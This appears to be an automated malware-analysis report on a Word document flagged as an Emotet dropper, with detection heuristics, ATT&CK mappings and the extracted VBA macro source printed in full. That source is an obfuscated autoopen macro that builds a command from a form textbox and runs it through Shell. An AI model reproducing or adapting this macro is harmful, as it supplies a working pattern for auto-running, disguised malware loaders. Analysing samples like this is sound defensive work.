MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an autoopen macro, which is a common technique for Emotet. The macros utilize Shell() calls to execute cmd.exe and PowerShell, indicating an intent to download and execute a second-stage payload. The ClamAV detection further supports the Emotet family attribution.
Heuristics 10
-
ClamAV: Doc.Dropper.Emotet-6788101-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-6788101-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set GPujbBBCrCDphAmMisl = hWjzTGkEVOBZfLXf jallcUPIk = Array(GwtcK, HApzPrPo, XrlSFG, Interaction.Shell(zChnzB, Tcodzqn), WdjqlqSoN) Select Case VvZohSwmhQbdLMBtRivIWDcs -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() mmRbN -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10371 bytes |
SHA-256: 1498bff61f1bfb1db0db41543cc58f24c2b5603a725b33dfb154f0c5a50a10a9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
275 of 322 identifiers look randomly generated (e.g. 'QNZkTDlChipdVBfFkMTiFCAr') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KUwUMcHHP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
mmRbN
End Sub
Attribute VB_Name = "YYuVYzzVHw"
Function mmRbN()
On Error Resume Next
Select Case SYstsSdPHIwqVFzkDQqLwF
Case 152821297
fLaOSbtaroniZEvkYwUcT = SDJUdZkmqMBIOjs
wjOYwjSUKzVFnAkuQ = Log(tXFwwUqFwacRpOsJBnN)
HmkoJdDiwqcHrpnUKwiuhti = 290820307
tJGNiwwjVRHmQpUQMGIwVZA = YwDFTNODswPTwQUrfaW
Case 154263776
htJOiVmauWUJfpfvrNHD = 21288596
UZATvlQTvCdvqFtrorbdwav = Log(RbpvnMPTcnYjNKaB)
baRfkwaBAYQcZvu = 199537957
CTwVfinJSCjKdiRaUXzdih = Log(OtmozrDriEXIGEnvsiWR)
End Select
Set trXuwBEYuAKUqhcsuoROLBFF = KVjcHzIPhVCPtAqwTk
Select Case WAGpmBwrwEFTQdAjT
Case 170116054
VwWSRNYDfNTdijKK = LEcZiXtdhRUcvRJbhwRAio
NzRdcbbkGSLXPzmraco = Log(vEbjwJBwmsJGWbObMuQCF)
OJktuivFrXuEjJWhjTZi = 327047287
IEAniLifMlfOpRzD = XBhAmMSvFEfOzcajA
Case 7376187
sHwjbMLJYRTFhdECdQMW = 291008565
rcHwRPIEfpQTKHaSGobCt = Log(lwwltazTninKPTccuvAU)
ipNSwcKKXvpoNqIAjWiGM = 9356139
fArGpdtfCZsHJkSwzmIQj = Log(VCdTcOZRNZcEhREVVjdQnOUj)
End Select
Set QNZkTDlChipdVBfFkMTiFCAr = RbmTLHhuULBAhuVrBAnP
Select Case mJdiwQjpNkphCBtjENo
Case 42324059
UwtTlLWoPlQwORN = bmXUdUUozcsIlBbbYSSKkPM
KAzwZlojjqcaQmb = Log(iEVJTODOKpXvwC)
MZSJdWVPLoIbvYA = 67731980
qSjftDlwzjnkNskijQBwcw = JpJUKmHqKilEfWbSVjNf
Case 257698051
fzwXzMIwMJsoWpjiaJqsd = 35389717
nFHHzfRPSqbKLYnouiL = Log(cMrzminGDpuEZVISp)
KTutZwviXKnVvKS = 255290400
bOIVPsLMdwXlqQVwpXrXjnsE = Log(LcSiujlmVhEhjva)
End Select
Set jwBYthuRWFmaPQnVDOEPs = iMlwUiRRGcQnCqqfNdiB
Select Case VBrIIihiUQwKcvh
Case 115365462
zCNkUpblnACFPjIDfb = SjAEvaktNlhhWCOjIM
ALPWUifZEhoHwULzlz = Log(SKjwOAGTjCBzzrHaJCMfVQBj)
ZdkMKDcmKtNQOBVN = 96291847
WDhoQptCwYRbBJDkoWVGVzYM = zuJuBqSHRidikNvTIGEUis
Case 29412053
iMzrHdWiUATujHuh = 337683834
kiaGEJanNtTsFFpwQp = Log(aznIwJjtAjBLXVOIamXHpRU)
dKcuOFnqFpYVwWbzU = 106590186
ELhwWrwPJthCJiXinjp = Log(vvKGhwtLDLamYrQEwOFD)
End Select
Set pdzXmPqYrnQfkiIBa = awlLwSudROSiZalNF
Select Case jvpBFYWkzkwbtTIU
Case 145896709
EnnnASrbAVcfCTtskw = nwzwuKGvaisYWMwKiX
uWJiXBIRhfhBiMwiYHqtcuW = Log(zIzGSGJLVsBwiSavl)
YQsdKMXiXDrdPAzrhPECwbW = 146000045
qKAEFjvIkWGYUwlioiFU = cBzmlKritwuWwTBXZRWvUfi
Case 297278523
NQTTKtQBoOIASUVEZq = 166850565
CXijLOQiYWwXGTYt = Log(PjDiUIFtWHzArvpEhQp)
jIvchdRRkuzvcjKHVhhOZq = 270729105
TihbHSYCiHoGoaw = Log(rnIbIBYKkiizibMtToJzwqK)
End Select
Set WwNUsDSukrXmhNwRJ = qZkYTHuunARzuAcqFL
Select Case KlYwCimtbkZrujC
Case 145579765
sAsLjJfjbQpTTwiwmpjA = GXaDBjYcSdYBVKJq
abtPbNwaIlrtIrSVOmcSHidH = Log(InRRzoYIpOIHwfK)
dtuhiKmFjHYhYoswmKSa = 205069783
KzTkScKNPGSoioi = VwBMkqPqkBWJVoMjwUj
Case 324091057
wsJuSrRPjJDQMoTZ = 124720965
ThcARGBsbuiqJFlLXGr = Log(SzwaArSsIzsKfzPPl)
bCtZPXhtAwfARNhBFUjBzZnI = 238410625
BYKMpVaZfpXsjbtHrUN = Log(ifcdrvjjwBOlpnV)
End Select
Set inIJarhsdNkIHri = uctVwjUuprbibmCvFl
Const Tcodzqn = 0
Select Case UbRtVszTasVHSUZU
Case 16936467
oBwzwmTXVGsqrsYM = WdiajEHFsMdlAiGzrRI
VfiZwXsbjAdjFwDrU = Log(HzpuEaplUcltAbPzCqzIc)
LfVrjujDaPcIJLa = 176357690
EkMCPqqzCTItMsMFwlJ = MqvFRBWQsREXcOuYQGv
Case 271372605
rhaYJOWQCKZQBPNoHlOT = 167981509
kPkRwznprqUtUJV = Log(HnzzqGiGazhjIVhVFkwK)
sPZcMTjwIuETadaTZRikir = 337993788
EhWJwnjMKtPYaXdnv = Log(REdQhrHBjTSaIAQJ)
End Select
Set fwazUKrIjOBtCnqpUZu = nziBzHQuklOIRwwqVMztmI
Select Case cmjGljbhCJTNRoSPdimKi
Case 194543593
UpTtVqwmuNpwEEm = JTQzRpaYQnzjwIVwwjOQR
FqGWZzbrOLrucqSfofOuch = Log(MpmsqwXqVRTOZruQawZZosC)
fjSsiCWNXAtjmHktrVWd = 59208745
sotPowCICTnHMKfiHTu = qZzNdTLjiTWZWDn
Case 198306155
TNYLPzZtfuaOMNDiDkTqjlUm = 148516463
izOkIWBfoFVubbXTwYl = Log(VFTqTSUnShtmopOci)
mEMhZwMIJrSMnwAEEddXRqB = 91001985
HLjGmMvpDmjFnjVi = Log(JcUFtzlkklzHdvCw)
End Select
Set SmdCXfXXkJUzQwHtGj = tHNOzVBavhaqdGTOjAI
Select Case HWiIdsFkQlbmJDZKD
Case 54416427
TkMqdtCntLiSNmp = VmoWwCMZMazNLJNJAmJ
ujEObELZiTOATfEXPlJR = Log(ndDwobkwYRacKdoiZvt)
mqtLwtjFptOdsGHDBSmdbbJ = 9931606
XJBPpqqPblwjrzuuiIfCzk = WljGJQPLjsXZkf
Case 273142435
DYNRVLTKTriwSiwrnGfiJjhz = 77786503
PrTaKPpJbdjThKRWmRh = Log(tBtjmdALqTrNFvvbq)
jTGIDUHTZUMmwPStjOwnohP = 200297781
HmWOmPpftkOLkwYYSE = Log(wDXcvMOhdCFzDcpvilFn)
End Select
Set WHDiDhwPZOVdif = kKbBXiMdolKjuCpnM
Select Case bLiKiYwMGjrVbWwqB
Case 74633059
tYkIEsqjRoSZGnIWACpKLGP = ziVAujITKLmrqC
RophYoHliSAwoMAjnIjJ = Log(WpohjwOvBQfzYXVWYr)
rznitnTGJbwiKtIuz = 1963937
rpsqhBUwPpiNOR = RYjHvuMsFTCiVEQcW
Case 145490556
zawHGjYoDRiOjRtcjLs = 32738468
fznWiTzuzMIqqRq = Log(RcaWFJaaESRbchQiR)
UcKkbMZuEFWXtzDJR = 228086027
iAVXNSLCXSSviZXwO = Log(hBNzKFVDjZRYSPi)
End Select
Set iRwEzSPKBclJszVD = BkhDlqQCJlmlwzCNRrFzJK
zChnzB = KUwUMcHHP.TextBox1 + wUzriSR + jWVwZLYJ + WKdOtt + NjbIL + TPMjW + IpEPpm + RdJBFRSF + jQEUMbKN
Select Case nGfdXzdPtJwlAZwp
Case 258790768
uzJWRwpjJHclBWP = UrGQbnlnJKibSMFYaIoqERp
onnWnIHcWJFFiWfGLWMHQ = Log(QzBDKtiZmCBYcnAP)
ACGFIGApDdiiiEiRaWqUjzNt = 323041020
DDJurGvWMEKHIqAOGQ = uEzTHBQJvPDoMI
Case 252868213
zfJlbjLsdHTOzT = 139683941
ztCSFjCtbwAGIPzzVnDizfY = Log(sEqAiBJbuMrSFUwN)
QJiiEkNJUtMPmtSVrZAt = 12999991
amYMvYftBoqFhVtc = Log(UcqOHzLITZwNvwTbEjrJso)
End Select
Set iasXZhLwbPkfRLzSpMEbzi = GqWdcmBSwjnMnPZmaIcV
Select Case riWZTvCVTYRwOlVKtTiO
Case 275849281
kqOoaajfjhQYYsG = DRiaEuvWGOAzadjioiwfLiV
pnskhqMdDzQQkPEpvrh = Log(aiFCwmkqubiYwBkR)
KpQBXuaNSuYdIk = 130137268
JCHhpmuGWicQrTifnnkCRJCn = pfsLMmqOcnzdjNYuKfoS
Case 64130995
zLtqVARfzzTCAGCuJw = 247960291
PjiBDZLHHiOVVS = Log(jSWQqzwnAKhMRsPWrjHH)
crmvoJYVkwjhaVcmf = 311372373
StirVNtOrHWoNL = Log(DajUBnYRPLBfrXmj)
End Select
Set lDoZtARiuujNOJSW = RCCKtRtbTfUhCrFX
Select Case VkiBPcALFEkDoqWsOMhZbRQ
Case 174593082
tWUBYYQiqUEimMAE = oLKBOmTHzQMATDTHo
FjKjjUVwVSOcAhVLcF = Log(LfkAtYHDiXRkWwqvY)
HfpjPQAtXQfiHaO = 289326083
qUfRIYRnbEisiJmzGVZa = PUzzBqYDPqWiVzasnzGY
Case 300390210
MSBtGthBFoRwbAfRGitjMO = 77920856
IKMESVTBlaHhwHjiV = Log(khMXXZMWsYfJcwGnk)
hcikVPNAtwTwwOOzdiBlmmsw = 188485491
WbwJaLXnztfAMwKWjNCuZRv = Log(UclzJuklHatlCjYHbKQV)
End Select
Set dRFaQGitiVEfUpzaX = DIusmCYUwovSPBaMrLjZ
Select Case kKqWiuobslvDIJMQsrEz
Case 261515677
JzIwSTwUsFdvLpqGt = azKAqbYcFQnwIlqTBrOjb
iYsqaNwWZlzUXqGIJj = Log(pNjhuwrErozsNJESmIA)
LiiqBAoOzMshhG = 248239695
wqztiIGhZtjLSYU = IiOKipfuHdFiwR
Case 72496067
XwUvKGTDYARIQdv = 179275735
rZCradILDmECblHicnVDYqB = Log(LmiXXdihimFsIPwT)
kHUOAzPKZopaXUBY = 287899678
owknZIWYpjOaMrBroijw = Log(oONzpoHGRDUQkIUb)
End Select
Set hMrcIjvzbwYffSrvUzkXqkTP = XcuJcjhQrBTEijfRz
Select Case cSqXBQnzYzwGAjAMXhVJBzdk
Case 259250194
brJwlESAFLKGIFpHU = bIOmrKZuuoucoGkmov
aOtnzbpCRZPTuiKJfBpAzY = Log(JiGcWEWVQuRuFhVOLBIIViV)
wiwEkzvqBXkIsz = 129914604
uDzZckEbKndwrQViIGirHRkQ = ashzMVMhJNRfvXNZVuzVzzkB
Case 35567793
mUcqcSiaBrXdwR = 116543744
hDDzMiQRmXmvBbIfs = Log(jrFTkzwVWWCrwjDj)
hwGnDELEFfnZajrlm = 225638126
LOSDCrMtOvaGrUIahmY = Log(muOfUJvwnLFKwdVEPuDv)
End Select
Set KwJiYvERIJzNCnRzmjtwQGC = QIOzEKnidpbzFAvNriiBGz
Select Case kZYlUqJLZbpjEVlOpQNw
Case 314073722
IEwHzcFMtaGsMbTRGzu = iYkXYOmYjlJWhJQUnNtjFMhO
MJKuXJOBAsjUbiipjdIQ = Log(KCKzitFNpWrVuMEcdMbvU)
QjAMiLrYjZwsBGzutQJoK = 149088213
wjWdNCQhVPdldzSOuWQmSXB = wcjTKmjWuoBfIhiW
Case 122328119
cdXUVvbCOStjabfLfkTzWjj = 46353166
pzmGNruUauYndHnrHXOcKOZ = Log(wBuCVUttQcjwow)
azPzhGYCdjFPLV = 198155427
bXmJLzszFAfWAaoDLVndv = Log(suYzQVPFhYmvFaCmq)
End Select
Set GPujbBBCrCDphAmMisl = hWjzTGkEVOBZfLXf
jallcUPIk = Array(GwtcK, HApzPrPo, XrlSFG, Interaction.Shell(zChnzB, Tcodzqn), WdjqlqSoN)
Select Case VvZohSwmhQbdLMBtRivIWDcs
Case 89794693
KVjnptLwfDUDwL = LwBTUqzHUwVSjZSSjaiHaFta
RNjwZNjkLKFbZtLKOLqUa = Log(YNkocUDWGEalCdSJvili)
PMrHhSwMtCGHooTNklP = 216657469
EAAnqisFQIirEJAsjvBGJM = UiNowvLzVBiKLr
Case 131802980
kEHduXPkfTVDpOafrzfJctt = 65644128
KMqVwoBMERBCiHz = Log(dJfZHHHbDTMLKOqLz)
jKZOjiTrlzYcJriuwjN = 237420918
CFOSfbqBqapFKXmpPcAGQWKC = Log(KVcQPHwNahFKwBDdpuW)
End Select
Set XwUvFjHNihjuMqVGNlbSr = jqhiTazcabnTDLAjLjzljsA
Select Case ofnWNLjkRQXiLf
Case 27309708
HiGcmzJuHIOQTwGdRMHoLtUq = EdljhljJZZHdfQ
VtOFwTRTJtMwXPlNNQaiUYN = Log(XfGtYwzmvRTRiPtimJb)
VmLuoLuNEiWzfpiRMXuLua = 19134334
wTizWrvKwbEkTMF = EmhNuVlphcVPPQsu
Case 233394295
wVczqNnLAEkzzA = 122094637
GIspLahtPuWjvjjKBPOjj = Log(vUZiUhFkfVwjJjC)
sXnjhvrHQUVawiliwzMYPdF = 210595
fPAjOXzHHWqwzZzdSSALfo = Log(jNhJXddPRnwBjqYBwWSoLvmz)
End Select
Set MuzKEoHrRRVjObidGYI = YSnuQEpNzlobij
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.